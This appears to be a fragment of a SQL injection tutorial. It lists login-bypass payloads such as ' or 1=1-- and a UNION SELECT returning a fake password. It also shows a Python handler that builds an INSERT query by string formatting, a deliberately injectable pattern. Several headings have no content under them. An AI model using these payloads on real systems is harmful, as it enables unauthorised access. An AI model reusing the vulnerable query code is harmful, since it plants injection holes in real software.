Client Side

Example Injections

# Login bypass, password compared in query
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

# Login bypass, password compared in code
admin' AND 1=0 UNION ALL SELECT 'fakepassword'--
            

Server Side

Python Code

Executed SQL Query

Client Side (AJAX)

Server Side

Python Code

import json

def view(self, request):
    input = json.loads(request.post)
    result = cur.execute("INSERT INTO products (id, name, price, stock) VALUES(%s, '%s', %s, %s)'" % (input['id'], input['name'], input['price'], input['stock'] ) )